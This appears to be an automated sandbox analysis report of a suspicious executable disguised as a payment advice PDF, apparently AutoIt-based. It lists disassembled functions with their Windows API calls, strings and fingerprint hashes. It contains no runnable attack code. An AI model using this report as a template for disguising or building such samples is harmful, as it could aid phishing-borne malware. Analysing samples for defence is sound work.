                                                              Function 008B21D6 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 62networkCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 008B222C
                                                              • InternetSetOptionW.WININET(00000000,00000032,?,00000008), ref: 008B2255
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1281243917.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                              • Associated: 00000000.00000002.1281224169.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281291899.00000000008CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281291899.00000000008F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281335693.00000000008FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281351794.0000000000907000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_840000_rPaymentAdviceNote_pdf.jbxd
                                                              Similarity
                                                              • API ID: Internet$OpenOption
                                                              • String ID: <local>
                                                              • API String ID: 942729171-4266983199
                                                              • Opcode ID: 66ceb498260c418794432be0bb31003795ad32da5f5c49fc3625adad12af06cd
                                                              • Instruction ID: 9246e25141df89f150091e36f47ca5f3000d341a560ba13fab732fc5f1f308ea
                                                              • Opcode Fuzzy Hash: 66ceb498260c418794432be0bb31003795ad32da5f5c49fc3625adad12af06cd
                                                              • Instruction Fuzzy Hash: 3D11C270541229BADB258F558C84EFBFBA8FF16755F10822AFA15D6600D3706990D6F0
                                                              Function 008B7D8B Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 55networkCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                                • Part of subcall function 008B7FF6: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000,?,?,?,008B7DB3,?,00000000,?,?), ref: 008B800D
                                                              • inet_addr.WSOCK32(00000000,?,00000000,?,?,?,00000000), ref: 008B7DB6
                                                              • htons.WSOCK32(00000000,?,00000000), ref: 008B7DF3
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1281243917.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                              • Associated: 00000000.00000002.1281224169.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281291899.00000000008CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281291899.00000000008F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281335693.00000000008FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281351794.0000000000907000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_840000_rPaymentAdviceNote_pdf.jbxd
                                                              Similarity
                                                              • API ID: ByteCharMultiWidehtonsinet_addr
                                                              • String ID: 255.255.255.255
                                                              • API String ID: 2496851823-2422070025
                                                              • Opcode ID: 6fea0df0c8adf78dd94c5b63f692ccfa943b0a4b72fd20a5d20d3167103c7388
                                                              • Instruction ID: ffa4ee6399d87c91951ca34ef55338e0a8e470742d2e2a3a487ff754d9deb5b0
                                                              • Opcode Fuzzy Hash: 6fea0df0c8adf78dd94c5b63f692ccfa943b0a4b72fd20a5d20d3167103c7388
                                                              • Instruction Fuzzy Hash: 15118234504309ABDB20AFA8DC86FFEB725FF44720F14455AEA11D7392DA71A9108691
                                                              Function 00898E05 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 52windowCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                                • Part of subcall function 00847DE1: _memmove.LIBCMT ref: 00847E22
                                                                • Part of subcall function 0089AA99: GetClassNameW.USER32(?,?,000000FF), ref: 0089AABC
                                                              • SendMessageW.USER32(?,000001A2,000000FF,?), ref: 00898E73
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1281243917.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                              • Associated: 00000000.00000002.1281224169.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281291899.00000000008CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281291899.00000000008F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281335693.00000000008FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281351794.0000000000907000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_840000_rPaymentAdviceNote_pdf.jbxd
                                                              Similarity
                                                              • API ID: ClassMessageNameSend_memmove
                                                              • String ID: ComboBox$ListBox
                                                              • API String ID: 372448540-1403004172
                                                              • Opcode ID: c0a34aca75a0afc5af8083cbde2ef58241ef2662d04b0cb2c9c69e4d0ebc20c0
                                                              • Instruction ID: ed22399ee1082eb765de68e78ea4ef0e5809c35988a7102e693dec1e33836ce4
                                                              • Opcode Fuzzy Hash: c0a34aca75a0afc5af8083cbde2ef58241ef2662d04b0cb2c9c69e4d0ebc20c0
                                                              • Instruction Fuzzy Hash: 7101D271A0122DAB9F14BBA8CC519FE7769FF06320B080619F831E73D2EE355808C651
                                                              Function 008A8D91 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 51COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1281243917.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                              • Associated: 00000000.00000002.1281224169.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281291899.00000000008CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281291899.00000000008F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281335693.00000000008FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281351794.0000000000907000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_840000_rPaymentAdviceNote_pdf.jbxd
                                                              Similarity
                                                              • API ID: __fread_nolock_memmove
                                                              • String ID: EA06
                                                              • API String ID: 1988441806-3962188686
                                                              • Opcode ID: b18e76207331bab625907756c2759543f0e06d01a11e064b540328ae8a4e7c51
                                                              • Instruction ID: 05adeb769645ca5d627f84da01c1d9754ba317eea00683e2a35750271d9d7857
                                                              • Opcode Fuzzy Hash: b18e76207331bab625907756c2759543f0e06d01a11e064b540328ae8a4e7c51
                                                              • Instruction Fuzzy Hash: 4401DD71D04218BEDB18DBA8CC5AEFE7BF8EB15311F00459FF552D6181E975E6048B60
                                                              Function 00898CFD Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 50windowCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                                • Part of subcall function 00847DE1: _memmove.LIBCMT ref: 00847E22
                                                                • Part of subcall function 0089AA99: GetClassNameW.USER32(?,?,000000FF), ref: 0089AABC
                                                              • SendMessageW.USER32(?,00000180,00000000,?), ref: 00898D6B
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1281243917.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                              • Associated: 00000000.00000002.1281224169.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281291899.00000000008CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281291899.00000000008F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281335693.00000000008FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281351794.0000000000907000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_840000_rPaymentAdviceNote_pdf.jbxd
                                                              Similarity
                                                              • API ID: ClassMessageNameSend_memmove
                                                              • String ID: ComboBox$ListBox
                                                              • API String ID: 372448540-1403004172
                                                              • Opcode ID: 8112dc0db5b01c5e4b318cca9cdf34908cd6c8e2e59e09e559f959d7c3852c44
                                                              • Instruction ID: 4d075f3df31faf85dde4c40d531f10330095b00f56fdfc825238689003fb2df4
                                                              • Opcode Fuzzy Hash: 8112dc0db5b01c5e4b318cca9cdf34908cd6c8e2e59e09e559f959d7c3852c44
                                                              • Instruction Fuzzy Hash: 9801D4B1A4110DABDF14FBA4C952EFE77A8FF16340F140029B901E32D2EE245E08D2B2
                                                              Function 00898D82 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 49windowCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                                • Part of subcall function 00847DE1: _memmove.LIBCMT ref: 00847E22
                                                                • Part of subcall function 0089AA99: GetClassNameW.USER32(?,?,000000FF), ref: 0089AABC
                                                              • SendMessageW.USER32(?,00000182,?,00000000), ref: 00898DEE
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1281243917.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                              • Associated: 00000000.00000002.1281224169.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281291899.00000000008CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281291899.00000000008F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281335693.00000000008FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281351794.0000000000907000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_840000_rPaymentAdviceNote_pdf.jbxd
                                                              Similarity
                                                              • API ID: ClassMessageNameSend_memmove
                                                              • String ID: ComboBox$ListBox
                                                              • API String ID: 372448540-1403004172
                                                              • Opcode ID: 9284f1319a4972290ef332fc47e9431ea364ea2730af047c8903bc9e992421b1
                                                              • Instruction ID: 79cbe5dff9a6cdb520d0ee57b7309944dd8382409a48f693445217bcad8a00d2
                                                              • Opcode Fuzzy Hash: 9284f1319a4972290ef332fc47e9431ea364ea2730af047c8903bc9e992421b1
                                                              • Instruction Fuzzy Hash: C701A771A5110DA7DF15F6A8C942EFE77A8FF16340F140015B805F3292DE254E08D272
                                                              Function 008A4F28 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 29COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1281243917.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                              • Associated: 00000000.00000002.1281224169.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281291899.00000000008CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281291899.00000000008F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281335693.00000000008FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281351794.0000000000907000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_840000_rPaymentAdviceNote_pdf.jbxd
                                                              Similarity
                                                              • API ID: ClassName_wcscmp
                                                              • String ID: #32770
                                                              • API String ID: 2292705959-463685578
                                                              • Opcode ID: 613c3e18e4fa1b2bd5d06523226c57e2aab06261f87d373c43e12fcf4b2cc401
                                                              • Instruction ID: 03bb51113b2a1c1e609e6ca2729c1152cc11d0a44d0a93df63d640e2b6cd1106
                                                              • Opcode Fuzzy Hash: 613c3e18e4fa1b2bd5d06523226c57e2aab06261f87d373c43e12fcf4b2cc401
                                                              • Instruction Fuzzy Hash: 82E02B325042282BE71097999C09EA7F7ACFB45B20F000016FD00D3041DA609A058BD0
                                                              Function 0087B2C1 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 22COMMON
                                                              Download Yara Rule
                                                              APIs
                                                                • Part of subcall function 0087B314: _memset.LIBCMT ref: 0087B321
                                                                • Part of subcall function 00860940: InitializeCriticalSectionAndSpinCount.KERNEL32(?,00000000,?,0087B2F0,?,?,?,0084100A), ref: 00860945
                                                              • IsDebuggerPresent.KERNEL32(?,?,?,0084100A), ref: 0087B2F4
                                                              • OutputDebugStringW.KERNEL32(ERROR : Unable to initialize critical section in CAtlBaseModule,?,?,?,0084100A), ref: 0087B303
                                                              Strings
                                                              • ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 0087B2FE
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1281243917.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                              • Associated: 00000000.00000002.1281224169.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281291899.00000000008CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281291899.00000000008F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281335693.00000000008FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281351794.0000000000907000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_840000_rPaymentAdviceNote_pdf.jbxd
                                                              Similarity
                                                              • API ID: CountCriticalDebugDebuggerInitializeOutputPresentSectionSpinString_memset
                                                              • String ID: ERROR : Unable to initialize critical section in CAtlBaseModule
                                                              • API String ID: 3158253471-631824599
                                                              • Opcode ID: bb1affba04200ebd718843690fdfdc478a404a09850317f62eb42ca3c19dbc2e
                                                              • Instruction ID: be3d2db30649ba30dd21f8c56efb65b7ab1079dc760f2c49bdb109f21090f69b
                                                              • Opcode Fuzzy Hash: bb1affba04200ebd718843690fdfdc478a404a09850317f62eb42ca3c19dbc2e
                                                              • Instruction Fuzzy Hash: 5EE06D70200B558FE720DF69E4047427AE9FF00704F01892CE55AC7342EBB4D448CFA1
                                                              Function 00897C74 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 22windowCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • MessageBoxW.USER32(00000000,Error allocating memory.,AutoIt,00000010), ref: 00897C82
                                                                • Part of subcall function 00863358: _doexit.LIBCMT ref: 00863362
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1281243917.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                              • Associated: 00000000.00000002.1281224169.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281291899.00000000008CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281291899.00000000008F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281335693.00000000008FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281351794.0000000000907000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_840000_rPaymentAdviceNote_pdf.jbxd
                                                              Similarity
                                                              • API ID: Message_doexit
                                                              • String ID: AutoIt$Error allocating memory.
                                                              • API String ID: 1993061046-4017498283
                                                              • Opcode ID: 6b606f1a4a95e274d27e242647dbed62dd79b080fe0d6c7aa22c8dd92b39aceb
                                                              • Instruction ID: 67b59ab25ae649b74498e8b89d0821c3b2ea4949632c0f526c6add579e834f36
                                                              • Opcode Fuzzy Hash: 6b606f1a4a95e274d27e242647dbed62dd79b080fe0d6c7aa22c8dd92b39aceb
                                                              • Instruction Fuzzy Hash: CAD0123239431836E21532AD6D07FDA7648EF15B56F040416FB14D97D349D6859051AA
                                                              Function 00881935 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 21COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GetSystemDirectoryW.KERNEL32(?), ref: 00881775
                                                                • Part of subcall function 008BBFF0: LoadLibraryA.KERNEL32(kernel32.dll,?,0088195E,?), ref: 008BBFFE
                                                                • Part of subcall function 008BBFF0: GetProcAddress.KERNEL32(00000000,GetSystemWow64DirectoryW), ref: 008BC010
                                                              • FreeLibrary.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000104), ref: 0088196D
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1281243917.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                              • Associated: 00000000.00000002.1281224169.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281291899.00000000008CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281291899.00000000008F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281335693.00000000008FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281351794.0000000000907000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_840000_rPaymentAdviceNote_pdf.jbxd
                                                              Similarity
                                                              • API ID: Library$AddressDirectoryFreeLoadProcSystem
                                                              • String ID: WIN_XPe
                                                              • API String ID: 582185067-3257408948
                                                              • Opcode ID: 29a9ce8fcd503b63dfe20d8ca816a7a116a1ac75bfd0241da6c67e097d9aeb38
                                                              • Instruction ID: ba6c75c5bc25d85954b3c3c6e6ea805dbca7753a26d95f45bfd98520bab9ba8f
                                                              • Opcode Fuzzy Hash: 29a9ce8fcd503b63dfe20d8ca816a7a116a1ac75bfd0241da6c67e097d9aeb38
                                                              • Instruction Fuzzy Hash: F0F0157080200DDFDB15EBA0C988AECBAB8FB08304F54049AE202E21A5CB704F85DF20
                                                              Function 008C5998 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15windowCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 008C59AE
                                                              • PostMessageW.USER32(00000000), ref: 008C59B5
                                                                • Part of subcall function 008A5244: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 008A52BC
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1281243917.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                              • Associated: 00000000.00000002.1281224169.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281291899.00000000008CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281291899.00000000008F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281335693.00000000008FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281351794.0000000000907000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_840000_rPaymentAdviceNote_pdf.jbxd
                                                              Similarity
                                                              • API ID: FindMessagePostSleepWindow
                                                              • String ID: Shell_TrayWnd
                                                              • API String ID: 529655941-2988720461
                                                              • Opcode ID: b373004fcda6cc29840d8b433b79fa7bedb207b931a907b5b6fe6b171e1db6df
                                                              • Instruction ID: f1dcf2a4a208499fafc7a18163b418ab18d872463afc1d0d768ba905276a44cd
                                                              • Opcode Fuzzy Hash: b373004fcda6cc29840d8b433b79fa7bedb207b931a907b5b6fe6b171e1db6df
                                                              • Instruction Fuzzy Hash: D5D0C931380711BBF6A4AB709C0BF966625FB15B50F000825B356EA1D1C9F4A800CA54
                                                              Function 008C5964 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15windowCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 008C596E
                                                              • PostMessageW.USER32(00000000,00000111,00000197,00000000), ref: 008C5981
                                                                • Part of subcall function 008A5244: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 008A52BC
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1281243917.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                              • Associated: 00000000.00000002.1281224169.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281291899.00000000008CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281291899.00000000008F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281335693.00000000008FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1281351794.0000000000907000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_840000_rPaymentAdviceNote_pdf.jbxd
                                                              Similarity
                                                              • API ID: FindMessagePostSleepWindow
                                                              • String ID: Shell_TrayWnd
                                                              • API String ID: 529655941-2988720461
                                                              • Opcode ID: b94fb104d910561f2b0bd9a48abaeb5165f22616af02705b3e2a11172e388c35
                                                              • Instruction ID: 12b737b5e0de925e9d3778984e61159da4a00481cd06df16625160afb4d4462b
                                                              • Opcode Fuzzy Hash: b94fb104d910561f2b0bd9a48abaeb5165f22616af02705b3e2a11172e388c35
                                                              • Instruction Fuzzy Hash: B0D0C931384711B7F6A4AB709C0BFA66A25FB14B50F000825B35AEA1D1C9F49800CA54